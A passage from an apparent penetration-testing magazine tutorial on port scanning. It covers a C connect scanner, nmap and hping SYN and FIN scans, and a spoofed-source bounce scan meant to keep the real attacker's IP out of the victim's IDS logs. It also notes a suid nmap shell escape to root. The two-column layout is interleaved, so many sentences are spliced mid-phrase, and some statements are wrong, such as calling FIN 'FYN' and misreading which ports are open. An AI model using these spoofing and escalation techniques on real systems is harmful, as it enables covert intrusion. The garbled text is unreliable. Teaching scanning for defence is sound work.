lems?” • “No sir, no problem, right now I’m just doing a
network discovery scan” • “What is that?” • “I’m just looking for ‘live’ hosts and open ports” • “… explain to me, what is this program doing? How does it work?” StartKit 01/2013(01)
The Transfer Control Protocol (or TCP as a short
knowledged packet is send (ACK) to refer to the particular packet and tells the sender that it ar rived. Each packet has a specific number. The ID
Page 32
http://pentestmag.com
Listing 1. Basic connecting program written in C for Linux /* * connect-scan.c * * Fast connect scanner written for demonstration only, this is for educational purposes only * * Copyright 2003(C) Enrique Alfonso Sanchez Montellano *
* */ #include #include #include #include #include #include uint32_t resolve (char *serv) { struct sockaddr_in sinn ; struct hostent *hent; hent = gethostbyname (serv); if(!hent ) return 0; bzero ((char *) &sinn, sizeof (sinn)); memcpy ((char *) &sinn.sin_addr , hent-> h_addr , hent-> h_length ); return sinn.sin_addr .s_addr ; } int connect_2_port (uint32_t victim , u_long port ) { int sockfd ; struct sockaddr_in hostaddr ; fprintf (stderr , "Trying port %d\t\t" , port); if((sockfd = socket (AF_INET , SOCK_STREAM , IPPROTO_TCP )) < 0) {
fprintf (stderr , "Cannot allocate socket\n" ); return -1;
}
hostaddr .sin_port = htons (port ); hostaddr .sin_addr .s_addr = victim ; hostaddr .sin_family = AF_INET ; if((connect (sockfd , (struct sockaddr *)&hostaddr , sizeof(hostaddr ))) != 0) {
fprintf (stderr , "Closed port\n" );
}
else {
fprintf (stderr , "Open port\n" );
}
close (sockfd ); return 0;
StartKit 01/2013(01)
Page 33
http://pentestmag.com
PENTESTING WITH TOOLS
}
void usage (char *name ) { fprintf (stderr , "Usage: %s -h -s -e \n" , name); fprintf (stderr , "\th: Host to scan\n" ); fprintf (stderr , "\ts: start port (default is 1)\n" ); fprintf (stderr , "\te: end port (default is 6000)\n" ); fprintf (stderr , "Bugs and comments to [email protected]\n\n" ); exit(0); } int main(int argc, char **argv ) { int start_port = 1, end_port = 6000; int option , i; char *victim ; uint32_t resolved_addie ; if(argc < 2) {
usage (argv[0]);
}
while((option = getopt (argc , argv, "h:s:e:" )) != EOF) { switch(option ){ case 'h':
victim = optarg ; break; case 's': start_port = atoi(optarg ); if((start_port < 0) || (start_port > 65535)) { fprintf (stderr , "Negative or bigger than actual ports detected setting to 1\n" ); start_port = 1; } break; case 'e': end_port = atoi(optarg ); if((end_port < 0) || (end_port > 65535 ) || (end_port < start_port )) { fprintf (stderr , "Weird stuff going on, either end port negative, over 65535 or lower than start port ... setting to port 2\n" ); end_port = 2; } break; }
}
resolved_addie = resolve (victim ); for(i = start_port ; i <= end_port ; i++) {
connect_2_port (resolved_addie , i);
}
return 0; }
StartKit 01/2013(01)
Page 34
http://pentestmag.com
number of it, is the number the host will refer to, it enable to tell from which connection it comes and if it’s on the order or is missing. An example of a TCP connection is the next: A client (C) sends a synchronize packet to the server (S) to initiate a connection, this packet contains a number to synchronize with (C(syn)), then the Server replies with the number the server will use to start the connection and an acknowledge of the first packet being received with the number the client send + 1 (S(syn/C(ack + 1))), at the end the client sends an acknowledge packet with the number the server send + 1 (C(S(ack + 1))). This is to synchronize and have the number straight, this way if packet 3 arrives before packet 2 the receiver waits for packet 2 and if times out it can send a packet asking for packet 2 again to be able to have the connection in the right order and complete.
A lot of things can be done with badly implement-
ed TCP/IP Stacks on operating systems and we will see some of them on this article.
Types of Scans Connectivity Scan This type of scan requires that the whole 3-way TCP connection is established and uses normal
sockets; this means you don’t need super user privileges to be able to run this scan and that any user can do it, this is usually logged even on the host due to the fact that you have to complete the whole connection. Writing a socket scanner is very easy, we are reinventing the wheel right now, but for sake of tech-
nicality, we are going to write our own fast socket scanner (Listing 1).
very important process to understand, since some techniques are based on the way TCP handles connections and on how different operating systems have implemented this. The majority of people I encounter do not real-
The function resolve() executes a gethostbyname and stores it into a sockaddr_in structure for further use and connections, this is a fairly generic function that can be reused in other programs, so is a good idea to either have it in a separate C file in case of multiple projects or in case of a bigger project by just design to be able to maintain it. But our scanner is fairly small and for readability we
ize that being able to sniff a network is not a good
have it within our code (Listing 2).
This is called the “3 way handshake”. This is a
thing, not only because you can see passwords
Nextly, the function connect_2_port() does the
all over the place, but because you can take over
actual connection, this is done by taking the result
connections. After after the connection is done, the
of the resolve function and the port and creating
only thing is that packets increment by 1 to be able to refer to them, so when you see passing packet 1 and 2, you know that packet 3 is coming. And, if the attacker manages to send packet 3 before the real connection, it can take over the connec-
a socket, filling the correct information (Listing 3).
tion due to the fact that it is not synchronized. The receiver sees that packet 3 has already been received and thinks it is a delay or a repeat and si lently drops it.
As the reader can see, nmap gathers and shows more information than our scanner, if you want to add the services you can parse the /etc/services file and add it up, but if you are writing your own
As you can see, writing a fast scanner based on
sockets and pure connection is easy, you can also use “canned tools” such as nmap (great scanner
and the industry standard): Listing 4.
Listing 2. Function to resolve into a sockaddr_in structure the IP Address or hostname given uint32_t resolve (char *serv) { struct sockaddr_in sinn ; //structure to ll out with the result of gethostbyname() struct hostent *hent; hent = gethostbyname (serv); // We execute gethostbyname() // If we could not resolve we return 0 if(!hent ) return 0; bzero ((char *) &sinn, sizeof (sinn)); memcpy ((char *) &sinn.sin_addr , hent-> h_addr , hent-> h_length ); return sinn.sin_addr .s_addr ; // Else we return the resolved address as a unsigned int }
StartKit 01/2013(01)
Page 35
http://pentestmag.com
PENTESTING WITH TOOLS scanner, you probably know a couple of most used
part of the 3 way handshake, this means a SYN
ports don’t you? This type of scan as it was said before, is usually really dirty and even the host
gets sent, then a SYN/ACK gets received but a RST is being sent instead of the ACK. This type of port scan is not logged by the host (unless you have a host based IDS in which case is the IDS that is logging not really the host any-
logs it sometimes (in the case of using wrappers) so expect your IDS to go bananas as soon as you run the port scanners with this option.
way), this port scan used to be logged on kernel
SYN Scan In this type of scan, the connection is not finished, rather a RST is sent instead of sending the last
2.0.X, since there was a bug in which you accepted really fast, but the bug was fixed so it doesn’t get logged anymore.
Listing 3. connect_2_port function int connect_2_port (uint32_t victim , u_long port ) { int sockfd ; struct sockaddr_in hostaddr ; fprintf (stderr , "Trying port %d\t\t" , port); if((sockfd = socket (AF_INET , SOCK_STREAM , IPPROTO_TCP )) < 0) { //Create socket
fprintf (stderr , "Cannot allocate socket\n" ); return -1;
}
hostaddr .sin_port = htons (port ); hostaddr .sin_addr .s_addr = victim ; hostaddr .sin_family = AF_INET ;
// Fill out the port we are going to connect // Fill out the address where is going to connect
if((connect (sockfd , (struct sockaddr *)&hostaddr , sizeof(hostaddr ))) != 0) {
fprintf (stderr , "Closed port\n" );
}
else {
fprintf (stderr , "Open port\n" );
}
close (sockfd ); return 0; }
Listing 4. nmap output for a Full connect scan nahual@fscking :~$ nmap -sT -n 127.0.0.1 //We are going to scan ourselves to make it fast Starting nmap V . 3.00 ( www.insecure .org/nmap/ ) Interesting ports on (127.0.0.1 ): (The 1599 ports scanned but not shown below are in state : closed ) Port State Service 22/tcp open ssh 111/tcp open sunrpc Nmap run completed -- 1 IP address (1 host up ) scanned in 0 seconds nahual@fscking :~$
StartKit 01/2013(01)
Page 36
http://pentestmag.com
This is one of the most widely used methods of scanning, it’s faster than the other one, since you don’t really have to wait for the connection to finish to realize that the port is open, as soon as you get
a SYN/ACK you know the port is open and add it up on the opened ports. You can use nmap; in this case you would have to use the –sS option instead of the –sT option to gather the information: Listing 5.
What happened? This type of scan requires root,
since you have to open raw sockets to be able to close them in a different way or even just not com-
plete the connection by spoofing the packets all the way and not having the kernel fill most of the stuff up.
I wouldn’t recommend making nmap suid, since it could potentially have bugs which could be ex-
Listing 5. Nmap execution os SYN scan without root privileges nahual@fscking :~$ nmap -sS -n 127.0.0.1 Starting nmap V . 3.00 ( www.insecure .org/nmap/ ) You requested a scan type which requires r00t privileges , and you do not have them . QUITTING ! nahual@fscking :~$
Listing 6. Nmap output of SYN scan nahual@fscking :~$ su Password : //Type root’s password here If there was in justice in the world , "trust" would be a four -letter word . root@fscking :~# nmap -sS -n 127.0.0.1 Starting nmap V . 3.00 ( www.insecure .org/nmap/ ) Interesting ports on (127.0.0.1 ): (The 1599 ports scanned but not shown below are in state : closed ) Port State Service 22/tcp open ssh 111/tcp open sunrpc Nmap run completed -- 1 IP address (1 host up ) scanned in 2 seconds root@fscking :~#
Listing 7. hping sending SYN packets to a closed p ort root@fscking :~# hping -S -p 130 127.0.0.1 HPING 127.0.0.1 (lo 127.0.0.1 ): S set , 40 headers + 0 data bytes len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =130 ags=RA seq =0 win=0 rtt=0.5 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =130 ags=RA seq =1 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =130 ags=RA seq =2 win=0 rtt=0.1 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =130 ags=RA seq =3 win=0 rtt=0.2 ms --- 127.0.0.1 hping statistic ---
4 packets tramitted , 4 packets received , 0% packet loss round-trip min /avg/max = 0.1/0.3/0.5 ms root@fscking :~#
StartKit 01/2013(01)
Page 37
http://pentestmag.com
PENTESTING WITH TOOLS
Listing 8. hping sending SYN packets to an open port root@fscking :~# hping -S -p 22 127.0.0.1 HPING 127.0.0.1 (lo 127.0.0.1 ): S set , 40 headers + len=44 ip=127.0.0.1 ttl=64 DF id =0 sport =22 ags=SA len=44 ip=127.0.0.1 ttl=64 DF id =0 sport =22 ags=SA len=44 ip=127.0.0.1 ttl=64 DF id =0 sport =22 ags=SA len=44 ip=127.0.0.1 ttl=64 DF id =0 sport =22 ags=SA
0 data bytes seq =0 win=32767 rtt=1.7 ms seq =1 win=32767 rtt=0.3 ms seq =2 win=32767 rtt=0.3 ms seq =3 win=32767 rtt=0.2 ms
--- 127.0.0.1 hping statistic ---
4 packets tramitted , 4 packets received , 0% packet loss round-trip min /avg/max = 0.2/0.6/1.7 ms root@fscking :~#
Listing 9. hping sending one packet to each port and incrementing after each packet root@fscking :~# hping -S -p ++ 127.0.0.1 HPING 127.0.0.1 (lo 127.0.0.1 ): S set , 40 headers + 0 data bytes len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =0 ags=RA seq =0 win=0 rtt=0.4 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =1 ags=RA seq =1 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =2 ags=RA seq =2 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =3 ags=RA seq =3 win=0 rtt=0.1 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =4 ags=RA seq =4 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =5 ags=RA seq =5 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =6 ags=RA seq =6 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =7 ags=RA seq =7 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =8 ags=RA seq =8 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =9 ags=RA seq =9 win=0 rtt=0.1 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =10 ags=RA seq =10 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =11 ags=RA seq =11 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =12 ags=RA seq =12 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =13 ags=RA seq =13 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =14 ags=RA seq =14 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =15 ags=RA seq =15 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =16 ags=RA seq =16 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =17 ags=RA seq =17 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =18 ags=RA seq =18 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =19 ags=RA seq =19 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =20 ags=RA seq =20 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =21 ags=RA seq =21 win=0 rtt=0.1 ms len=44 ip=127.0.0.1 ttl=64 DF id =0 sport =22 ags=SA seq =22 win=32767 rtt=0.7 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =23 ags=RA seq =23 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =24 ags=RA seq =24 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =25 ags=RA seq =25 win=0 rtt=0.2 ms --- 127.0.0.1 hping statistic ---
26 packets tramitted , 26 packets received , 0% packet loss round-trip min /avg/max = 0.1/0.2/0.7 ms root@fscking :~#
StartKit 01/2013(01)
Page 38
http://pentestmag.com
ploited (In older versions if nmap was suid you could just nmap --interactive then just !/bin/sh
of the options, this is not as “clean” as nmap that gives you everything already processed, but that
your way into root) so su or sudo into root account
would be because hping creates packets, sends
and try again the scan: Listing 6. By now, you must be wondering why I’m using the –n option and not saying anything about it, the –n option is to have the program not resolve the
them and shows you the response so the interpretation is left to the user, this one is more flexible and you can read it for yourself. Some options are going to be discussed here and some won’t.
IP address or name (even as weird as it sounds)
Check your man page for more details. Hping can take a huge amount of options, the
while trying to print it, meaning it will not resolve lo-
calhost to 127.0.0.1. Then, try to resolve 127.0.0.1 back to print it out, this would take more time, and
most important ones are:
we are not going to waste any time on that!
• -S: Tells hping to add the SYN ag into the TCP packet • -A: Tells hping to add the ACK ag into the TCP packet • -r: Tells hping to make the increment ID of the packet relative • -a: Tells hping to spoof the address which is
But using canned tools without knowing how they work in the back is not that good, is not fun, and in complex scenarios it might even get you in trouble. We are going to use one of my favorite tools: hping.
Hping is coded by Salvatore Sanfilippo (antirez) and you can find on http://www.kyuzz.org/antirez/hping2.html or just apt-get install on a debian based distribution (Kali, formerly known as back-
track already contains hping). This tool will let us create packets with options as we wish, without having to code an entire packet creator ourselves, so we port scan the same machine with hping. To run hping, you need to be root, and read some
written right after the option as if it was sent from that particular address
• -p: Destination port for the packet • -i: interval in which to send the packets (if we use u is microsenconds) Now let’s see how a closed port looks like in hping: Listing 7.
Listing 10. hping sending SYN packets with grep open ports root@fscking :~# hping -S -p ++ 127.0.0.1 -i u1000 | grep SA len=44 ip=127.0.0.1 ttl=64 DF id =0 sport =22 ags=SA seq =22 win=32767 rtt=0.2 ms len=44 ip=127.0.0.1 ttl=64 DF id =0 sport =111 ags=SA seq =111 win=32767 rtt=0.1 ms --- 127.0.0.1 hping statistic ---
810 packets tramitted , 810 packets received , 0% packet loss round-trip min /avg/max = 0.1/0.1/0.7 ms root@fscking :~#
Listing 11. nmap executing a FIN scan root@fscking :~# nmap -sF -n 127.0.0.1 Starting nmap V . 3.00 ( www.insecure .org/nmap/ ) Interesting ports on (127.0.0.1 ): (The 1599 ports scanned but not shown below are in state : closed ) Port State Service 22/tcp open ssh 111/tcp open sunrpc Nmap run completed -- 1 IP address (1 host up ) scanned in 3 seconds root@fscking :~#
StartKit 01/2013(01)
Page 39
http://pentestmag.com
PENTESTING WITH TOOLS If we read on the line and search for flags, we
get the flags that the returned packet has which are RA, R for RST and A for ACK, this means that
the server got the SYN packet (because of the ACK) but the port is closed (is not offering any services) since we have the R flag turned on. Another nice indication is the fact that the window size for the port is 0, saying you cannot send a maximum amount of data in that port (since its
closed of course!). If the port is open the result would look like this: Listing 8. The reader can see how the flags section has changed from RA to SA, this meaning SYN for the S and A for the ACK, meaning the port is open, the window size is also something different
that 0, meaning you can send data trough that port. But doing one line of command each port and reading everything can be trying, how can I send to each port? We use the –p option with ++:
Listing 9. We can see that the sport is giving us the destination port for the server. Also, we can see that all ports, apart from port 22 is opened since is the one that has the SA and the window size different than 0.
To make it faster and less complicated to read, we can use grep and the –i option: Listing 10. We sent 810 packets but used grep to only print the SA flags, meaning we only want the opened ports, we get the same result as the other scans:
port 22 and port 111 are opened.
Listing 12. hping used to execute a FIN scan root@fscking :~# hping -F 127.0.0.1 -p ++ HPING 127.0.0.1 (lo 127.0.0.1 ): F set , 40 headers + 0 data bytes len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =0 ags=RA seq =0 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =1 ags=RA seq =1 win=0 rtt=0.4 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =2 ags=RA seq =2 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =3 ags=RA seq =3 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =4 ags=RA seq =4 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =5 ags=RA seq =5 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =6 ags=RA seq =6 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =7 ags=RA seq =7 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =8 ags=RA seq =8 win=0 rtt=0.1 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =9 ags=RA seq =9 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =10 ags=RA seq =10 win=0 rtt=0.1 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =11 ags=RA seq =11 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =12 ags=RA seq =12 win=0 rtt=0.4 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =13 ags=RA seq =13 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =14 ags=RA seq =14 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =15 ags=RA seq =15 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =16 ags=RA seq =16 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =17 ags=RA seq =17 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =18 ags=RA seq =18 win=0 rtt=0.5 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =19 ags=RA seq =19 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =20 ags=RA seq =20 win=0 rtt=0.2 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =21 ags=RA seq =21 win=0 rtt=0.2 ms //Hey port 22 is gone! len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =23 ags=RA seq =23 win=0 rtt=0.5 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =24 ags=RA seq =24 win=0 rtt=0.3 ms len=40 ip=127.0.0.1 ttl=64 DF id =0 sport =25 ags=RA seq =25 win=0 rtt=0.2 ms --- 127.0.0.1 hping statistic ---
26 packets tramitted , 25 packets received , 4% packet loss round-trip min /avg/max = 0.1/0.3/0.5 ms root@fscking :~#
StartKit 01/2013(01)
Page 40
http://pentestmag.com
FYN Scan FYN Scan is a scan in which you send a packet with FYN, meaning is the end of the connection, in
which case the server will not respond to the packet but silently drop the connection, with FYN the connection is read with out of band data and terminates nicely, which is different with RST which reads no out of band data just drops the connection. This type of scan is used to bypass simple SYN
filtering firewalls, one of the tricks about this is that open ports do not respond since they have to si-
lently read the packet and not answer to it. In which case if the FYN packets are filtered in the firewalls all the ports will look opened! Using nmap we get the same results as the other scans: Listing 11. We cannot discern what is going on in here since everything is done for us by the program, so we
use hping to see the results of sending packets to the server: Listing 12.
As you ca see by the comment port 22 is not
printed, the packet is lost, this means that port 22 is opened since it has to drop it after processing it silently.
This type of scan is pretty much like SYN scan so this part should be short, just remember that in a FYN scan opened ports do not respond. Warning Windows does not respond as the RFC requires (what a surprise!) so it replies with RA, showing on the scanners and as you read that all the ports are closed.
Bounce Scanning By now all the IDS in your network should be screaming hacker all over he place with your IP showing in every log, remember I said this are not really stealth scans, now up to the stealth part of scanning.
Listing 13. hping sending SYN/ACK packets to a host root@fscking :~# hping -S -A -r -n 192.168.132.1 -p 100 HPING 192.168.132.1 (eth1 192.168.132.1 ): SA set , 40 headers + 0 data bytes len=46 ip=192.168.132.1 ttl=128 id=16133 sport =100 ags =R seq=0 win=0 rtt=17.0 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =100 ags=R seq=1 win=0 rtt=0.4 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =100 ags=R seq=2 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =100 ags=R seq=3 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =100 ags=R seq=4 win=0 rtt=0.3 ms --- 192.168.132.1 hping statistic ---
5 packets tramitted , 5 packets received , 0% packet loss round-trip min /avg/max = 0.3/3.6/17.0 ms root@fscking :~#
Listing 14. hping sending SYN/ACK packets to a host root@fscking :~# hping -S -A -r -p 130 192.168.132.1 HPING 192.168.132.1 (eth1 192.168.132.1 ): SA set , 40 headers + 0 data bytes len=46 ip=192.168.132.1 ttl=128 id=20058 sport =130 ags =R seq=0 win=0 rtt=0.4 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=1 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=2 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=3 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=4 win=0 rtt=0.3 ms And the count just keeps on going but for the sake of brevity I will not put everything here !
Listing 15. hping sending SYN packets with fake address to a host root@fscking :~# hping -S -a 192.168.132.1 -p 80 192.168.132.2 -i u1000 HPING 192.168.132.2 (eth1 192.168.132.2 ): S set , 40 headers + 0 data bytes Program seems to hang in here , look at the other terminal
StartKit 01/2013(01)
Page 41
http://pentestmag.com
PENTESTING WITH TOOLS Some years ago a way to bounce scan trough windows machines and routers was published.
by the victim dropping it silently and not incrementing the RST id. This way if we pull the RST id con-
Due to the fact that windows TCP/IP stack is so overwhelming in complexity, it can be used to read
stantly while sending spoofed packets to the victim we can know which ports are opened.
the RST ID numbers and fake packets from that
The firewall and the IDS on victim are going to
host to the victim. By using the windows/router host RST ID increment, the real IP address of the
think the scan if coming from the spoofed machine,
attacker is hidden from the victim. Windows RST id increments by 1 while not be-
tacker the appearance of coming from different
ing really pushed with traffic, meaning the TCP/IP
networked right it will look as normal traffic or virus
stack increments by 1 not randomly like the other
traffic. For this type of scan you need 2 shells if they are possible next to each other or at least visible at the same time, on the first one we are going to start pul-
OS, giving us the opportunity to spoof the connection nicely and getting some nice results:
So when you send a packet and it gets RST, the id increments sequentially: Listing 13.
there goes your very expensive IDS, giving the athosts at the same time and of course if the tool is
ing the RST id to a windows machine: Listing 14.
Using the –r option we can see the increment on
the id is +2, meaning the first one was 16133 but the second one was id of that packet minus the id before it (16135 – 16133 = 2), but the increment is sequential giving us the opportunity of spoofing the connection.
Now imagine a network like this: Figure 1.
Warning Note You do not need that port to be opened since you want the RST not a SYN/ACK. That should make it really hard to find, a non firewalled windows machine in the internet with low traffic, something hard to find huh? When you are ready, the next command will send
a lot of packets to the victim machine spoong it as the windows machine (you don’t get any output
from this command): Listing 15. If the port is opened, you will notice an increment on the id, in my case port 80 is not opened so noth-
ing happens (victim is RST; Listing 16). Try to guess in which line I typed the command
and started to send the spoofed packets to port 22 with the next command: Listing 17. As you can see, the RST id is incremented to
Figure 1. Steps taken for a bounce scan
102 and stayed there. As soon as I hit ctrl-C to stop sending packets, the id went down to +2 again.
If you start pulling the RST id from the spoofed
machine, you can see that it increments by 1 each time; now the attacker sends a spoofed SYN packet which looks like it’s coming from the spoofed machine and goes to the victim, as soon as the victim responds with the appropriate SYN/ACK packet the spoofed machine is going to RST it, why? Because it did not initiate the connection so is not on it’s table, it resets the connection and of course
that has a RST id on it. Next time we check send the SYN/ACK packet to pull for the RST id from the spoofed machine the increment is not going
to be 1 but 2, since it already sent another RST to the victim, giving us that the port we spoofed to is open.
You cannot RST a RST packet, so it the port is closed the spoofed machine will get a RST packet StartKit 01/2013(01)
This tells me that this port is open and is leaving logs as the windows machine, very nice and easy to do, although it is really hard to do it one port at the time right? A bounce scan can be downloaded at http://www.security-dojo.com/code/bscan.c .
UDP Scan Some services run under the User Datagram Protocol since they need bigger data window and they are not oriented to connectivity (such
as mountd, nfsd and other). This services have their ports assigned and since it is another protocol, the ports can be the same as TCP but not the service! A very used service that uses UDP is
the nameserver service, which runs under port 53 UDP (and TCP) resolving requests go under UDP by default.
Page 42
http://pentestmag.com
How do we know the UDP port is open? Because
is not there, port 111 (sunrpc) is open so it returns
by RFC it should not respond and if its closed it should send an ICMP Port Unreachable if it’s closed, so we can write our own scanner based on
nothing, remember UDP is a connectionless proto-
that, let’s see an example using hping (Listing 18). Port 53 (domain) is closed on the machine so it returns ICMP Port Unreachable since the service
col so every packet is assumed to have data that is to be used on the connection. You can use a canned tool such as nmap and the results would
be like this: Listing 19. As you can see the results are the same, you could use hping to scan the en-
Listing 16. hping sending SYN/ACK packets to a windows host root@fscking :~# hping -S -A -r -p 130 192.168.132.1 HPING 192.168.132.1 (eth1 192.168.132.1 ): SA set , 40 headers + 0 data bytes len=46 ip=192.168.132.1 ttl=128 id=21078 sport =130 ags=R seq=0 win=0 rtt=0.5 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=1 win=0 rtt=0.5 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=2 win=0 rtt=0.4 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=3 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=4 win=0 rtt=0.2 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=5 win=0 rtt=0.2 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=6 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=7 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=8 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=9 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=10 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=11 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+3 sport =130 ags=R seq=12 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+3 sport =130 ags=R seq =13 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=14 win=0 rtt=0.4 ms len=46 ip=192.168.132.1 ttl=128 id=+6 sport =130 ags=R seq=15 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+123 sport =130 ags=R seq=16 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+102 sport =130 ags=R seq=17 win=0 rtt=0.2 ms len=46 ip=192.168.132.1 ttl=128 id=+102 sport =130 ags=R seq=18 win=0 rtt=0.2 ms len=46 ip=192.168.132.1 ttl=128 id=+102 sport =130 ags=R seq=19 win=0 rtt=0.2 ms len=46 ip=192.168.132.1 ttl=128 id=+102 sport =130 ags=R seq=20 win=0 rtt=0.2 ms len=46 ip=192.168.132.1 ttl=128 id=+102 sport =130 ags=R seq=21 win=0 rtt=0.2 ms len=46 ip=192.168.132.1 ttl=128 id=+59 sport =130 ags=R seq=22 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=23 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=24 win=0 rtt=0.3 ms len=46 ip=192.168.132.1 ttl=128 id=+2 sport =130 ags=R seq=25 win=0 rtt=0.3 ms --- 192.168.132.1 hping statistic ---
26 packets tramitted , 26 packets received , 0% packet loss round-trip min /avg/max = 0.2/0.3/0.5 ms root@fscking :~#
Listing 17. hping sending SYN packets with fake address to a host root@fscking :~# hping -S -a 192.168.132.1 -p 22 192.168.132.2 -i u1000 HPING 192.168.132.2 (eth1 192.168.132.2 ): S set , 40 headers + 0 data bytes --- 192.168.132.2 hping statistic ---
619 packets tramitted , 0 packets received , 100% packet loss round-trip min /avg/max = 0.0/0.0/0.0 ms root@fscking :~#
StartKit 01/2013(01)
Page 43
http://pentestmag.com
PENTESTING WITH TOOLS tire range using the –p ++ option or even use our own UDP scanner
Conclusion
A good scan is as good as half of the penetration on the machine, having reliable information is basic for analyzing the host and not underestimating it or overestimating it.
This article covers a lot of code and not a lot on writ-
ing (which was fun for me), there is not a lot new to say on scanning. Having knowledge of what happens behind the network scanners such as nmap helps a lot, if you don’t understand why you get a RST when you send a SYN/ACK instead of a SYN
or feel the TCP/IP theory is lacking I recommend reading TCP/IP Illustrated I, II and III by Richard
Stevens, they are the best books on the subject. Scanning is highly underrated, it is the first step
to gather information on the network while on a hands on basis, it reports open ports, operating systems, filtered ports, if there are any firewalls, how are they done and which are they own policies, etc.
